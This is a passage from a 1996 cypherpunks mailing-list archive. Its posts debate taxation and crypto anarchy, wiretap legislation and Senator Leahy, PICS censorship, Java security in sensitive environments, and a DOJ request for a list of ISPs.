the Surveillance State a reality. This should _never_ be forgotten.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 16:53:34 +0800
To: "Pablo Escobar" <vznuri@netcom.com>
Subject: Re: proposed anti-pseudospoofing law in Georgia
Message-ID: <adaffd66050210048aa0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:00 PM 5/3/96, Vladimir Z. Nuri wrote:
>>       "anti-psuedospoofing".
>
>pardon me, I thought that was the correct term. I saw someone
>like Hal Finney or TCM (PM? EH?) use it here as I recall.
>it's hard to remember. if there is a more correct term I will
>be happy to use that in the future.

Larry, as you certainly know, I am also known as "Nick Szabo" and "Robert
Hettinga," Hal Finney is just another name for "Eric Hughes" and "Sandy
Sandfort," and "Perry Metzger" actually a pseudonym shared by both me and
John Gilmore.

On occasion we meet to do a Vulcan mind-meld and adopt new identities.

--Medusa







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 4 May 1996 18:21:12 +0800
To: Michael Loomis <ml3e+@andrew.cmu.edu>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <ElWSW6y00iWWM1ZWIa@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.93.960503185604.1770E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 3 May 1996, Michael Loomis wrote:

> Excerpts from internet.cypherpunks: 2-May-96 Re: CryptoAnarchy: What's
> w.. by Black Unicorn@schloss.li 
> > I must assume either
> > 
> > 1) He is not intimately familiar with the system of U.S. taxation (even if
> > he is pro-high-tax, calling the current system 'just about right' is
> > folly).
> 
> No tax system will ever been perfect, but  income taxation is a good
> system of taxation.

Bear in mind that the current system imposes more than just income tax and
that the United States, unlike most other countries, taxes worldwide
income and compensates with an immensely complicated foreign tax credit
system.

> Income taxation inevitably requires some accounting
> costs, but these costs should be going down with advances in computing
> technology and other technology.  The goal should be to minimize these
> costs.

Accounting costs as a result of income taxation do not bother me.
Accounting costs as a result of a deduction based, multi-tiered,
progressive, and supplimented system of income taxation are silly.  The
income tax system in the United States has been driven since the post war
period by the effort to implement policy through the congress' power to
tax rather then the simple need for funds.  Allowing special interest
groups to drive a system of taxation is hardly fitting the goal of
"minimizing these costs."  The income tax system in the United States thus
fails even your test.

Exercise for the reader:  How many de fact laws are implemented by an
tax which would be unconstitutional to pass directly?

> I would further suggest it is remarkably childish to think that
> a political system will not cause some unfairness in the tax code,
> because it is the nature of democracy to generate some unfairness.

I don't recall ever asserting this.  

> As
> long as the unfairness is kept within reasonable bounds as in the case
> of the 1986 tax reform, I don't see that this unfairness as a killing
> objection to income taxation.

Then the issue that divides us is the definition of fairness.

> Of course, unlike most of the readership
> of this list, I believe that democracy is a good thing.

That's a pretty arrogant (and fairly incorrect) assumption.

[...]

> sized government on them.  Outside of crypto-cyber-carrots, I have
> strong doubts that crypto of any form or sophistication will be able to
> circumvent consumption taxation.

Sorry, I just don't agree with you here.  If black markets exist, even
florish, without crypto, how exactly is it that you think they will not be
easier to run and maintain and shield from discovery in the presence of
encryption?

The amount of resources which would have to be dedicated to tax compliance
enforcement under your scheme would be staggering.  I don't doubt that
taxation (if it comes to this) will go down kicking and screaming, but if
you can think of a way to regulate offshore markets in information futures
without invading the country hosting the exchange (note that there is a
case that even this can be defended against by the market) I'd like to
hear it.

> Consumption taxation would, of course,
> include a tax on the amount of information coming into your computer.  I
> don't think that the government will have any problem determining the
> quantity of the information & since it will be encrypted anyway, I don't
> see the privacy worries.

You don't see the privacy worries in mandating data providers to count
bits and report to a central authority on their findings?

It's clear you're unconvertable.

We should take this discussion (if it continues) to e-mail.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 15:36:12 +0800
To: sjb@universe.digex.net
Subject: Re: PICS required by laws
Message-ID: <01I4A37X6Y0W8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sjb@universe.digex.net"  "Scott Brickner" 16-APR-1996 19:02:13.04

>The sorts of organizations that form the core of the internet, and are
>involved in this network layer censorship scheme, just *aren't* the
>sort of "subversives" (or "patriots", take your pick) that would try to
>bypass the system.

	I am not quite certain if the model of
[content provider]-[ISP]-[Phones]-[ISP]-[ISP]-[user] is going to work much
longer. That routes the material through quite a few too many bottlenecks,
among them the phone lines. I could reasonably easily sign up with two ISPs
and start myself as a router (with a good computer and the right software),
from what I know of the subject; with ecash routing of messages, this might
get quite common (and profitable).
	When you've got a few large organizations doing the routing, what
you've said is _probably_ correct. When you've got a lot of people doing it
out of their garages, then it isn't.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 15:08:07 +0800
To: cypherpunks@toad.com
Subject: PICS & CyberAngels
Message-ID: <01I4A3GEC4UU8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In view of the discussion of the possibility of PICS being required
by law, plus that about the CyberAngels, I thought people might find it
interesting that the CyberAngels home page has on it as one of their
"responsibilities" making sure that all pages with sexual content - that
pornography fetish again - have PICS or other (such as Safesurf...) ratings
that would permit censorship of them.
	If parents want to keep their children from seeing sexual material,
that's the problem of the parents - it shouldn't be the problem of anyone else.
If something I put out offends someone (e.g., some political speech I've made),
that's the problem of the person it offends. Sexual material is no different.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 4 May 1996 15:14:42 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Leahy is No Friend of Ours
In-Reply-To: <adaf989101021004d99d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960503191858.1770H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Timothy C. May wrote:

> At 8:34 AM 5/3/96, Black Unicorn wrote:

> >While I believe this correct, it's worth noting that Leahy is fairly
> >"into" the technology.  He finds it entertaining and "fun."  All of this
> >mostly thanks to his one time counsel John Podesta.  Thanks Mr. Podesta!
> >
> >He's one of the more interested congress critters.
> >
> >> So, what is accomplished except "feel good" thoughts?
> >
> >Admittedly, not much.  I'm at least pleased he has a decently on the ball
> >staff however who can tell him what the issues are.
> 
> "Decently on the ball"? I hope you are being ironic.

Not at all.  (Did you mean sarcastic?)  His staff are some of the most
astute people on the hill technologically.  That their view might tend to
the statist side disturbs me, but I wasn't talking about their politics.
On the hill a competent and fairly reasonable enemy is much less a problem
than an incompetent publicity seeker.

> Leahy is no friend of ours. Recall that he chaired the hearings on the
> FBI's "Digital Telephony" massive wiretap proposal, and co-sponsored the
> legislation (with former FBI agent Don Edwards).

I remember, I was sitting at the hearings.

One should bear in mind that it was Specter who pushed for hearings
originally, and Specter who was giving with one hand and taking with the
other all through the process.  I won't say I'm happy with Leahy for the
legislation, but that doesn't change the fact that he has a clue.  In my
view the legislation would have been much worse and Clipper more imposing
had Leahy not been involved.

Mind you, I never said Leahy was a giant in the movement for crypto and
privacy interests, just that I was glad someone had a clue.

> This "sleeping giant" of legislation is still out there, and has not been
> consigned to the junk heap. It becomes operative--that is, the $10,000 per
> day penalties for noncompliance with the law mandating telecom systems be
> DT-compliant--in October 1997.

[...]

> Several of us (Black Unicorn, Duncan Frissell, me, etc.) may point out the
> practical difficulties involved in such enforcement, and the longterm dim
> prospects for success. But the fact is that ISPs are a kind of "choke
> point" for halting certain things. I have a feeling I know what my ISP will
> say if he gets a court order and a $10,000 per day penalty faces him. Those
> who access the Net directly, through their own companies and/or by having
> boxes hanging directly on the Net, will be less vulnerable to this kind of
> pressure. But the Netcoms, PSI, Earthlinks, AOLs, and such will likely run
> into  trouble the first time a court order is presented to make certain
> Internet phone conversations tappable....

Agreed.

> (I have long argued for this view that certain "choke points" will be
> identified).

[...]

> Sure, a few services will decide to fight such penalties in court and seek
> to have Digital Telephony thrown out in court. Deep pockets will be
> required. Maybe they'll prevail. Maybe the Burns Bill will collide with
> Digital Telephony. Unclear at this time.
> 
> But no Congressman who co-sponsors such legislation as the "National
> Wiretap Initiative," with its "1% of the engineering capacity" requirements
> and other such Big Brother Surveillance State clauses, is a friend of ours.

Again, I never called him a friend, but I still submit to you, that his
influence in the legislative process blunted some of the highly offensive
positions.  Sometimes you have to expect legislators to make compromises.
It's a fact of the "democratic process" that Mr. Loomis is so very fond
of.  The result is that to gain influence over a given area of legislative
intent and effort, you sometimes have to sleep with whores (and
occasionally they have VD).

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 15:21:19 +0800
To: tcmay@got.net
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <01I4A4XI53G48Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  3-MAY-1996 19:48:00.78

>Leahy is no friend of ours. Recall that he chaired the hearings on the
>FBI's "Digital Telephony" massive wiretap proposal, and co-sponsored the
>legislation (with former FBI agent Don Edwards).

	Fascinating. I'd still say to use PGP when sending mail when possible
in order to give the NSA more to worry about in traffic analysis. However, it
does look like Leahy isn't exactly a governmental type to whom I wish to send
an encouraging message. This may explain the problems with his initial bill
on cryptography export.

>The implications for the Internet and for increasingly popular "Internet
>phone" systems are interesting. As I understand the DT language, such
>systems would have to be made compliant with wiretap requests, or face the
>$10K/day penalties. This could force many ISPs, in the U.S. of course, to
>take steps to immediately restrict certain programs, or even
>[speculatively] force them to become compliant by some form of key escrow,
>where they would keep a copy of a key for presentation to law enforcement.
>[More speculation by me: the combination of the Wiretap Act, the
>Anti-Terrorism Act, and the still-ongoing work on key escrow (TIS is still
>pushing their system, Lotus hasn't backed down, Denning still says it's
>needed, etc.) could mean that ISPs move to restrict use of crypto in
>various ways, possibly mandating escrowed encryption.

	Why do you think I enquired about encryption in the Internet Phone
software in Netscape? Deployment of such as soon as possible - with the
encrypted version being the default, or even automatic - would be a decided
help.

>Several of us (Black Unicorn, Duncan Frissell, me, etc.) may point out the
>practical difficulties involved in such enforcement, and the longterm dim
>prospects for success. But the fact is that ISPs are a kind of "choke
>point" for halting certain things. I have a feeling I know what my ISP will
>say if he gets a court order and a $10,000 per day penalty faces him. Those
>who access the Net directly, through their own companies and/or by having
>boxes hanging directly on the Net, will be less vulnerable to this kind of
>pressure. But the Netcoms, PSI, Earthlinks, AOLs, and such will likely run
>into  trouble the first time a court order is presented to make certain
>Internet phone conversations tappable....

	One question is whether the ISP will be able to detect whether someone
is violating such a law.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sat, 4 May 1996 14:48:52 +0800
To: cypherpunks@toad.com
Subject: Known Arms Traffickers
Message-ID: <Pine.LNX.3.91.960503200229.12644M-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




I have added a checkbox to my arms-trafficker page so that if you
want to be added to a list of "Known Arms Traffickers" you can be.
The URL is:

   http://online.offshore.com.ai/arms-trafficker/

The page that says:

  "Click here to become an International Arms Trafficker"

  -- Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 4 May 1996 15:24:01 +0800
To: jya@pipeline.com
Subject: Re: Dole Backs Crypto Export
In-Reply-To: <199605031309.JAA16482@pipe2.nyc.pipeline.com>
Message-ID: <199605040139.UAA23812@homeport.org>
MIME-Version: 1.0
Content-Type: text


If Dole proves this isn't Clintonesque pandering by getting the bill
through as Senate Majority Leader, I'll hold my nose and vote for him
for President.

Adam

jya@pipeline.com wrote:
|    Financial Times, May 3, 1996, p. 7.
|    Dole backs removal of software export ban
|    By Louise Kehoe in San Francisco
| 
|    Senator Bob Dole, the presumptive Republican presidential
|    candidate, yesterday threw his support behind proposed
|    legislation to remove US export restrictions on computer
|    software used to encode Internet messages.

|    For Senator Dole, the encryption bill provides an
|    opportunity to seek support from Silicon Valley high-tech
|    leaders many of whom backed Mr Bill Clinton in 1992, and to
|    boost his election campaign efforts in California.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 4 May 1996 15:02:46 +0800
To: jsw@netscape.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <3189A993.A19@netscape.com>
Message-ID: <199605040141.UAA23833@homeport.org>
MIME-Version: 1.0
Content-Type: text


I saw this on your pages.  Where can I get the beta, and will it work
with my firewall so I can 'force' all users to upgrade to a version
that understands it?

Adam

Jeff Weinstein wrote:

| Perry E. Metzger wrote:
| > Netscape with Java cannot be so tested because important components
| > come down off the net.  So no, I'm not holding Netscape with Java to a
| > higher standard. I'm very much holding it to the same standard.
| 
|   The Netscape Administration Kit will allow a site security admin
| to create a configuration that disables Java, and does not allow the
| user to enable it.  If your customers require netscape, perhaps this
| is an option that will make you more comfortable.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 4 May 1996 14:52:20 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605032013.QAA24832@jekyll.piermont.com>
Message-ID: <199605040150.UAA23886@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Hospitals are similar, in space, although not time
constraints.  An operating theatre needs to be kept reasonable
sterile, and the larger the area, the more difficult it is to do that.

Perry E. Metzger wrote:

| "E. ALLEN SMITH" writes:
| > 	Might I suggest setting up another computer with Java enabled, and
| > _without_ the critical applications? Somehow, I think they can afford an
| > extra computer for each desk
| 
| Money is not a problem, but space is. There is never any room on a
| trading floor. Space is at an amazing premium.
| 
| Perry
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 4 May 1996 15:53:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Leahy is No Friend of Ours
In-Reply-To: <adaff858040210045a9e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960503210515.6288A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Timothy C. May wrote:

[Well deserved irony lecture deleted]

> On your other points, we mostly agree.
> 
> I was just emphasizing the Senator Patrick Leahy pushed the bill that make
> the Surveillance State a reality. This should _never_ be forgotten.

Agreed.  I never meant to imply otherwise.

> 
> --Tim May
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 17:05:36 +0800
To: cypherpunks@toad.com
Subject: Re: "Bit Tax" proposed by satan@hell.gov
Message-ID: <adb030b801021004ab95@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 PM 5/3/96, Steve Reid wrote:

>The problem with a tax on data is that it would be *extremely* unfair.

Chill out, it's not a real proposal.

>It would be like a tax on atoms. With a tax on atoms, the tax on a bag of
>groceries would be hundreds of times greater than the tax on a diamond
>ring, because there are more atoms in a bag of groceries
>
>Bits are the digital equivalent of atoms. With a tax on bits, the tax on
>the download of an up-to-date virus scanner would be hundreds of times
>greater than the tax on an emailed business contract.
>
>If this bit tax thing were attempted, the amount of time people spend
>online would be determined entirely by their income; if you can't afford

"Yeah, my tax guy really saved me a lot last year...he knows some really
great data compression algorithms."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 4 May 1996 17:40:04 +0800
To: "Pit Bull" <perry@piermont.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605032042.QAA24915@jekyll.piermont.com>
Message-ID: <199605040620.XAA15527@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> but again, the Java designers never claimed that
>> "Perry Metzger will be able to use Java in his mission critical
>> funds transfer application".
>
>I keep saying that I don't care about not being able
>to use it there -- the problem is even having a copy of Netscape with
>Java enabled on the same machine as a trading system. One instance of
>Netscape running Java can endanger an entire trading floor.

right. substitute "unapproved software" wherever you use the
term "Java" and you will see that at the heart of it
you don't really have a real case against Java in particular.

what is your point? that someone suitably paranoid would never
come close to running Java on their machine? I fully agree with
you there.

oh, I should think that a suitably paranoid sysadmin will be sure
to create an oppressive, straightjacket
environment in which "unapproved software" would be squelched or would 
never have a chance to run in the first place. it seems
to me if you have to worry about it happening, you've already
lost.

in fact the NSA thrives on solving these kinds of problems. I 
once worked with a guy that emanated out of that black hole, and
I found him highly capable of squelching any possible 
incongruous or creative thought that crossed his path, in the
same way that state-of-the-art software is routinely denied
employees of companies out of security paranoia.

if you want to live in the world, you will always face some kind
of insecurity. freedom and restriction are mutually exclusive.
if you are against freedom in software choice by end users in 
an environment you control, well, what does Java have to do with that? 
its just another insignificant program on the long list of software
you don't allow. although, I suppose, a
particularly scary one at that--one that denies
the whole paradigm of control by a central authority over software
to obtain security, offering a contrary solution that may be
workable in the long run, and might even flourish.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sat, 4 May 1996 17:51:16 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <4m8av7$sls@abraham.cs.berkeley.edu>
Message-ID: <199605040637.XAA13509@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Weinstein  <jsw@netscape.com> wrote:
> >
> >  It might be interesting to make a small plugin that just does some core
> >stuff like gathering entropy, mod-exp, and related stuff difficult or too
> >slow in java.  I mainly brought it up because people were asking about
> >calling native code from java.
> >
> In an alternate universe in which I didn't have projects to finish, I may
> be interested in doing something like this.  However, I haven't been able
> to find information on how to write Unix (or preferably portable) plugins.
> 
> Any hints?
> 
>    - Ian

I don't have any hints, but I think people need to be aware up front
that calling native code from a Java applet disables
any security that might otherwise be enforced for the applet.  

It's OK to do this, as long as you understand up front how things work. 
One of the restrictions on applets is that they can't load DLLs or .so's. 
People get around that restriction by choosing to install a DLL on the
local machine in such a way that the applet can invoke methods defined in
that DLL (or .so) By choosing to do that, they're deliberately saying
"it's OK, I understand this native method might do anything at all on the
machine and it's OK by me" 

Marianne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 4 May 1996 22:25:39 +0800
To: cypherpunks@toad.com
Subject: Re: proposed anti-pseudospoofing law in Georgia
In-Reply-To: <adaffd66050210048aa0@[205.199.118.202]>
Message-ID: <v0300660dadb082fe3685@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


> Larry, as you certainly know, I am also known as "Nick Szabo" and "Robert
> Hettinga," Hal Finney is just another name for "Eric Hughes" and "Sandy
> Sandfort," and "Perry Metzger" actually a pseudonym shared by both me and
> John Gilmore.
>
> On occasion we meet to do a Vulcan mind-meld and adopt new identities.

Ah. Well, I suppose that beats the "Diamond Age" method...

Cheers,
Tim May
AKA Bob Hettinga
AKA Nick Szabo

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 4 May 1996 15:30:01 +0800
To: cypherpunks@toad.com
Subject: What are the Feds looking at now :)
Message-ID: <199605032150.XAA15313@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


This message was observed to flow to firewalls mailing today...
could this mean mean something is going on??


	anon

  >Return-Path: firewalls-owner@GreatCircle.COM
  >Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP 
  >	(peer crosschecked as: miles.greatcircle.com [198.102.244.34])
  >	id QQaodh13554; Fri, 3 May 1996 15:23:00 -0400 (EDT)
  >Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA12439 for firewalls-outgoing; Fri, 3 May 1996 11:25:42 -0700 (PDT)
  >Received: from justice.usdoj.gov (justice.usdoj.gov [149.101.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA12425 for <Firewalls@GreatCircle.COM>; Fri, 3 May 1996 11:25:37 -0700 (PDT)
  >Received: by justice.usdoj.gov id aa17656; 3 May 96 14:07 EDT
  >From: <casey@justice.usdoj.gov>
  >To: Firewalls@GreatCircle.COM
  >Subject: Firewalls-Digest V5 #289
  >X-Mailer: SCO Portfolio 2.0
  >Date: Fri, 3 May 1996 14:03:09 -0400 (EDT)
  >Message-ID:  <9605031403.aa16958@justice.usdoj.gov>
  >Sender: firewalls-owner@GreatCircle.COM
  >Precedence: bulk
  >
  >I am looking for a list of all the Internet 
  >Service Providers world-wide.  Can anyone point me 
  >in the right direction?
  >
  >Thanks in advance,
  >
  >Mary L. Casey, Program Analyst
  >Information Management &
  >  Security Staff
  >Information Resources Management
  >Justice Management Division
  >U.S. Dept of Justice




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 4 May 1996 18:21:27 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605040652.XAA09692@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>1)  Read as wide a variety of the stuff out there you can 
>    (even the books by "dangerous crackpots").  
>2)  Take a vacation to a tax haven you like because of what
>    you've read about it.


What tax havens would you like, if you did business in tax 
havens, which of course you do not ;-)
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 4 May 1996 18:39:29 +0800
To: brerrabbit@alpha.c2.org
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199605031831.LAA15730@infinity.c2.org>
Message-ID: <Pine.SUN.3.93.960504013939.20344A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996 brerrabbit@alpha.c2.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Sandy Sandfort <sandfort@crl.com> wrote:
> >A couple of generations ago, only multinationals and the super
> >rich could avail themselves of offshore banks, asset protection
> >trust, foreign incorporation, etc.  Fifteen years ago, I was 
> >helping members of the upper middle class do the same think.
> >
> >Today, virtually anyone on this list can afford these techniques.
> >Non-US people have been using them for years.  The reason middle
> >class Americans aren't savvy that yet are ignorance and inertia.  
> >Everyday, Americans are becoming less parochial (due in part,
> >ironically, to government hysteria about money laundering) about
> >such possibilities.  As the Clintons and Doles turn up the tax
> >and regulatory heat, they will also overcome their inertia.  
> 
> Do tell.  How would someone, just for instance, who is considering
> leaving a "permanent" job for the higher compensation available to
> contractors and consultants be able to structure a business in such a
> way as to benefit from these techniques?  If we assume a rate of
> between $60/hour and $125/hour (typical in Boston, New York, and the
> Silicon Valley), how much can one save?  How much effort and money is
> required?  How much risk is involved?

Actually, I disagree with Mr. Sandfort on this one.

Taxation of International Income is a tremendously complicated field.
(You can get an LL.M. in international taxation alone for example).

While many on the list may be clever enough to find the resources to
properly structure businesses such to limit their tax exposure, the real
need is to research tax law, not tax technique.  This is a dynamic and
ever changing field and I cannot condone going it alone.  Tax consultants
charge $150 an hour (though I would be surprised to find an international
tax consultant worth his or her salt who was this cheap) because they can.

I've been doing international issues for years and I still get surprised
occasionally.  So do experts who have been doing it for decades.

If your simply looking to pick a jurisdiction, that's not so hard.
Neither is simply using a tax haven in simple ways or concealing skimmed
or cash assets.  Actually structuring an internatinal business endeavor is
a whole different ball game.


Are you looking to avoid or evade taxes?  Are you willing to relocate?
Renounce your U.S. (?) citizenship?  Can you do your consulting from an
offshore office?  Will you be in the United States for more than 182 days
a year?

I could go on for pages with questions like these that will significantly
change the solutions for you.

Blame Mr. Loomis' "fair and reasonable" taxation system for the fact that
I could also easily bill you $5000 for basic and rudimentary consultation.

> There are many books on the shelves claiming to show how to avoid
> taxes using these techniques.  Most of them have the smell of
> "dangerous crackpot" about them.  Can you recommend any in particular?

Absolutely essential core reading includes:

Graetz, Federal Income Taxation, Third Edition and Code Suppliment for
1996.

The text is 1100+ pages, the code 2025 pages.

Lind, Schwarz et. al., Fundamentals of Corporate Taxation, Third Edition.

This text is 790 pages with a ~50 page yearly suppliment.

Gustafson, Pugh, Taxation of International Transactions 4th Edition, with
International Income Taxation Code and Regulations suppliment and current
tax law suppliment.

The text is 860 pages, the code and regulations book 2604 pages and the
current suppliment for 1996 is 100 pages.

Any book more than a few years old or without a yearly or (as with the
better publications quarterly) suppliment, is useless.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 4 May 1996 21:54:16 +0800
To: cypherpunks@toad.com
Subject: Re: What are the Feds looking at now :)
In-Reply-To: <199605032150.XAA15313@utopia.hacktic.nl>
Message-ID: <Pine.BSF.3.91.960504022935.1360A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> This message was observed to flow to firewalls mailing today...
> could this mean mean something is going on??

> >From: <casey@justice.usdoj.gov>
> >I am looking for a list of all the Internet 
> >Service Providers world-wide.  Can anyone point me 
> >in the right direction?

Hmm... This person doesn't seem to realize the size of the internet, or
it's decentralized nature. 

I wouldn't worry about this guy. Even if such a list existed, he wouldn't
know what to do with it. 

"C:\>type isplist.txt"... heheh... :)


(Yes, I know some people compile lists of ISPs, but those lists cover 
only the tip of the iceburg. And yes, I also know that the root 
nameservers have massive databases, but they don't provide much info 
beyond the domain names and IP addresses.)

======================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)     |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/  |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E6 8C09EC52443F8830 |
|               -- Disclaimer: JMHO, YMMV, IANAL. --                 |
====================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Unix Cypherpunk <x@x.x>
Date: Sat, 4 May 1996 16:17:39 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.GUL.3.93.960503110332.20948B-100000@Networking.Stanford.EDU>
Message-ID: <199605040212.EAA01278@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Rich" == Rich Graves <llurch@networking.stanford.edu> writes:

> On Fri, 3 May 1996, Michael Loomis wrote:
>> circumvent consumption taxation.  Consumption taxation would, of course,
>> include a tax on the amount of information coming into your computer.  I
